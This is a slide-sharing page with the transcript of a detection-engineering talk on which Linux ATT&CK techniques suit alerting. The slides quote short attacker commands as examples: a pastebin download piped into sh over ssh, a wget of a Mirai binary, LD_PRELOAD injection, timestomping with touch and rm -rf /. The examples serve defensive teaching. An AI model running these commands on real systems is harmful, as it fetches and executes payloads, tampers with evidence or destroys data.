Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Alertable Techniques for Linux using MITRE ATT&CK

Tony M Lambert
October 29, 2019
Technology
1
2.2k

Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019
Tweet

More Decks by Tony M Lambert

See All by Tony M Lambert
The Wild World of macOS Installers
forensicitguy
0
33
Whitelisting LD_PRELOAD For Fun and No Profit
forensicitguy
0
360
Spotting Lateral Movement - BSides Augusta 2019
forensicitguy
1
930
Intelligence Driven Testing with Atomic Red Team
forensicitguy
2
390
Spotting Lateral Movement with Endpoint Data
forensicitguy
2
580

Other Decks in Technology

See All in Technology
Commitment vs Harrisonism - Keynote for Scrum Niseko 2024
miholovesq
6
1.1k
カメラを用いた店内計測におけるオプトインの仕組みの実現 / ai-optin-camera
cyberagentdevelopers
PRO
1
120
顧客が本当に必要だったもの - パフォーマンス改善編 / Make what is needed
soudai
24
6.8k
AWS re:Inventを徹底的に楽しむためのTips / Tips for thoroughly enjoying AWS re:Invent
yuj1osm
1
580
IaC運用を楽にするためにCDK Pipelinesを導入したけど、思い通りにいかなかった話
smt7174
1
120
omakaseしないための.rubocop.yml のつくりかた / How to Build Your .rubocop.yml to Avoid Omakase #kaigionrails
linkers_tech
3
770
コンテンツを支える 若手ゲームクリエイターの アートディレクションの事例紹介 / cagamefi-game
cyberagentdevelopers
PRO
1
130
生成AIとAWS CDKで実現! 自社ブログレビューの効率化
ymae
2
330
運用イベント対応への生成AIの活用 with Failure Analysis Assistant
suzukyz
0
120
CAMERA-Suite: 広告文生成のための評価スイート / ai-camera-suite
cyberagentdevelopers
PRO
3
270
コンテナのトラブルシューティング目線から AWS SAW についてしゃべってみる
kazzpapa3
1
100
Datachain会社紹介資料(2024年11月) / Company Deck
datachain
4
16k

Featured

See All Featured
5 minutes of I Can Smell Your CMS
philhawksworth
202
19k
The Cult of Friendly URLs
andyhume
78
6k
What's new in Ruby 2.0
geeforr
342
31k
No one is an island. Learnings from fostering a developers community.
thoeni
19
3k
Raft: Consensus for Rubyists
vanstee
136
6.6k
Unsuck your backbone
ammeep
668
57k
The World Runs on Bad Software
bkeepers
PRO
65
11k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
42
9.2k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
6.9k
KATA
mclloyd
29
13k
Fontdeck: Realign not Redesign
paulrobertlloyd
81
5.2k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
27
1.9k

Transcript

  1. Alertable Techniques for Linux Using MITRE ATT&CK™

  2. ▪ Find & detect adversaries using data ▪ Recovering system

    administrator ▪ Love to teach, hate to grade homework Tony Lambert Detection Engineer/Intel Red Canary @ForensicITGuy id -un

  3. ▪ What’s an alertable technique? ▪ Decision criteria for alerting

    ▪ The good, the bad, and the ugly Overview

  4. ▪ Notification of abnormal condition ▪ Requires context for triage

    ▪ Requires care and feeding for efficacy What’s an alert?

  5. Alert Workflow Condition occurs 1 Defender investigates 2 3 4

    Alert fires Escalate or hide

  6. ▪ High volume by default ▪ Lack of context Problems

    with Alerts

  7. Decision Criteria for Alerts ▪ Time to investigate (lower is

    better) ▪ Significance of abnormality (urgent is better) ▪ Time to respond (lower is better)

  8. Alerts that don’t suck

  9. Timestomping (T1099) touch -acmr /bin/sh /file/to/timestomp ▪ Quick to investigate

    ▪ Significant destruction of evidence

  10. Process Injection (T1055) /etc/ld.so.preload LD_PRELOAD=/tmp/evil.so ▪ Quick to respond ▪

    Used by rootkits, affects user tools

  11. Masquerading (T1036) /tmp/kworkerds /dev/shm/kthreadds ▪ Quick to investigate ▪ Signals

    significant abnormality

  12. We can make these work...

  13. Remote File Copy (T1105) curl https://pastebin.com/evilThing wget http://<ip address>/mirai.x86 ▪

    Requires much tuning ▪ Hunt for outliers in command line

  14. Remote Services (T1021) ssh … [email protected] '(curl hxxps://pastebin.com/payload | sh'

    ▪ Tune out deployment tools ▪ Significant for lateral movement

  15. Worst. Alerts. Ever.

  16. Anything Discovery whoami, netstat, ifconfig, etc. ▪ OS noise makes

    high volume ▪ Better for cluster analysis

  17. Sudo (T1169) sudo ./make_sandwich.sh ▪ Long investigations with little return

    ▪ Better for reporting/audits

  18. File Deletion (T1107) rm -rf / ▪ Probably non-functional rule

    ▪ Helpdesk will know before the alert

  19. Alert where possible, report/hunt otherwise REDCANARY.COM/BLOG

  20. Q & A https://github.com/bfuzzy1/auditd-attack https://github.com/Neo23x0/auditd RESOURCES